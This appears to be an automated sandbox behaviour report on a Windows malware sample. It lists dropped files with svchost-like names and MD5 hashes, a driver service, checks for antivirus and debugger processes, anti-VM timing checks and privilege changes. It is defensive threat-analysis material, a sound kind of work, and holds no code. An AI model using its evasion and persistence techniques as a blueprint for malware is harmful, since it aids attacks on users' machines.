C:\WINDOWS\system32\svchostrr.exe ---> 99e778905dd0b1b08c8f88acb3daabac
C:\WINDOWS\Registration\CRMLog\servero.exe ---> be66127782768c1807c99c74f06f982c
C:\WINDOWS\86F252CD\svchsot.exe ---> be66127782768c1807c99c74f06f982c
C:\WINDOWS\system32\svkkk.exe ---> 15102f3b77c78570656fe680efe7af16
C:\WINDOWS\SoftwareDistribution\DataStore\Logs\svhoss.exe ---> d973ffa66ad30b99e4ef12d4da25a9c9
C:\WINDOWS\security\Database\ko.exe ---> 936d51787485d882976e6e76ade602af
C:\WINDOWS\kk\svchost.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\svchostaao.exe ---> 5ed33d0581eb5573f314944d600cdc24
C:\WINDOWS\tt\svchost.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\WINDOWS\system32\svchostaao.exe ---> 5ed33d0581eb5573f314944d600cdc24
C:\WINDOWS\bb\svchost.exe ---> fe1d0ee5901dd167ee9b28eece31786c
Behavior description: 创建系统服务
details: [服务创建成功]: FIETXBEH, C:\WINDOWS\system32\drivers\FIETXBEH.sys
Behavior description: 创建互斥体
details: CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
RasPbFile
Local\!PrivacIE!SharedMemory!Mutex
CritOpMutex
MSCTF.Shared.MUTEX.IOH
MSIMGSIZECacheMutex
Behavior description: 对比可疑进程名
details: stricmp: [System Process] <------> avp.exe Des: 卡巴斯基
lstrcmpiA: System <------> avp.exe Des: 卡巴斯基
lstrcmpiA: smss.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: csrss.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: winlogon.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: services.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: lsass.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: QFcxService.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: wwocthlp.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: svchost.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: spoolsv.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: jqs.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: QQCpgradeHelper.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: alg.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: explorer.exe <------> avp.exe Des: 卡巴斯基
Behavior description: 尝试打开调试器或监控软件的驱动设备对象
details: \??\SICE
\??\NTICE
\??\SIWVID
Behavior description: 搜索kernel32.dll基地址
details: Instruction Address = 0x006897d1
Instruction Address = 0x004b2789
Instruction Address = 0x004fb792
Behavior description: 打开事件
details: HookSwitchHookEnabledEvent
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\SvcctrlStartEvent_A3752DX
\INSTALLATION_SECURITY_HOLD
MSFT.VSA.COM.DISABLE.2612
MSFT.VSA.IEC.STATUS.6c736db0
_fCanRegisterWithShellService
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010
MSCTF.SendReceiveConection.Event.IOH.IC
MSCTF.SendReceive.Event.IOH.IC
N/A
MSFT.VSA.COM.DISABLE.3116
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000011
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000011
Behavior description: 获取TickCount值
details: TickCount = 283406, SleepMilliseconds = 60000.
TickCount = 283453, SleepMilliseconds = 60000.
TickCount = 223600, SleepMilliseconds = 100.
TickCount = 223615, SleepMilliseconds = 100.
TickCount = 223631, SleepMilliseconds = 100.
TickCount = 223662, SleepMilliseconds = 100.
TickCount = 223678, SleepMilliseconds = 100.
TickCount = 223693, SleepMilliseconds = 100.
TickCount = 223771, SleepMilliseconds = 100.
TickCount = 223787, SleepMilliseconds = 100.
TickCount = 223818, SleepMilliseconds = 100.
TickCount = 283718, SleepMilliseconds = 60000.
TickCount = 283734, SleepMilliseconds = 60000.
TickCount = 283765, SleepMilliseconds = 60000.
TickCount = 283812, SleepMilliseconds = 60000.
Behavior description: 直接获取CPU时钟
details: EAX = 0xb897f208, EDX = 0x000000b6
EAX = 0xb897f254, EDX = 0x000000b6
EAX = 0xb897f2a0, EDX = 0x000000b6
EAX = 0xb897f2ec, EDX = 0x000000b6
EAX = 0xefed6290, EDX = 0x000000b6
EAX = 0xefed62dc, EDX = 0x000000b6
EAX = 0xa3556a16, EDX = 0x000000bc
EAX = 0xa3556a62, EDX = 0x000000bc
EAX = 0xa3556aae, EDX = 0x000000bc
EAX = 0xa3556afa, EDX = 0x000000bc
EAX = 0xab1808f0, EDX = 0x000000bc
EAX = 0xab18093c, EDX = 0x000000bc
EAX = 0xb07e07e8, EDX = 0x000000bc
EAX = 0xb07e0834, EDX = 0x000000bc
EAX = 0x530aa170, EDX = 0x000000c8
Behavior description: 探测 Virtual PC是否存在
details: N/A
Behavior description: 创建事件对象
details: EventName = DINPUTWINMM
EventName = Global\userenv: User Profile setup event
EventName = MSCTF.SendReceive.Event.IOK.IC
EventName = MSCTF.SendReceiveConection.Event.IOK.IC
Behavior description: 查找指定窗口
details: NtUserFindWindowEx: [Class,Window] = [MS_AutodialMonitor,]
NtUserFindWindowEx: [Class,Window] = [MS_WebCheckMonitor,]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
NtUserFindWindowEx: [Class,Window] = [,瑞星程序升级中]
NtUserFindWindowEx: [Class,Window] = [,]
Behavior description: 窗口信息
details: Pid = 2612, Hwnd=0x10378, Text = 下载完毕, ClassName = Static.
Pid = 2612, Hwnd=0x1037a, Text = 获取文件信息:, ClassName = Static.
Pid = 2612, Hwnd=0x1037c, Text = update.exe (来自 www.2345.com), ClassName = Static.
Pid = 2612, Hwnd=0x10380, Text = 文件大小未知, ClassName = Static.
Pid = 2612, Hwnd=0x10382, Text = 估计剩余时间:, ClassName = Static.
Pid = 2612, Hwnd=0x10384, Text = 已下载:, ClassName = Static.
Pid = 2612, Hwnd=0x10386, Text = 下载到:, ClassName = Static.
Pid = 2612, Hwnd=0x10388, Text = 传输速度:, ClassName = Static.
Pid = 2612, Hwnd=0x10390, Text = 下载完成后关闭此对话框(&C), ClassName = Button(CheckBox).
Pid = 2612, Hwnd=0x10392, Text = 打开(&O), ClassName = Button.
Pid = 2612, Hwnd=0x10394, Text = 打开文件夹(&F), ClassName = Button.
Pid = 2612, Hwnd=0x10396, Text = 取消, ClassName = Button.
Pid = 2612, Hwnd=0x10364, Text = 已完成安装 0% - / (来自 www.2345.com), ClassName = #32770.
Pid = 2612, Hwnd=0x103ae, Text = 您想运行或保存此文件吗?, ClassName = Static.
Pid = 2612, Hwnd=0x103b2, Text = 名称:, ClassName = Static.
Behavior description: 调整进程token权限
details: SE_LOAD_DRIVER_PRIVILEGE
SE_DEBUG_PRIVILEGE
Behavior description: 枚举窗口
details: N/A
Behavior description: 调用Sleep函数
details: [1]: MilliSeconds = 60000.
[2]: MilliSeconds = 100.
[3]: MilliSeconds = 60000.
[4]: MilliSeconds = 0.
[5]: MilliSeconds = 0.
[1]: MilliSeconds = 0.
[2]: MilliSeconds = 0.
[3]: MilliSeconds = 0.
[6]: MilliSeconds = 0.
[7]: MilliSeconds = 0.
[8]: MilliSeconds = 0.
[9]: MilliSeconds = 50.
[10]: MilliSeconds = 500.
[6]: MilliSeconds = 1000.
[7]: MilliSeconds = 1000.
Behavior description: 打开互斥体
details: ShimCacheMutex
Local\!IETld!Mutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
CtfmonInstMutexDefaultS-*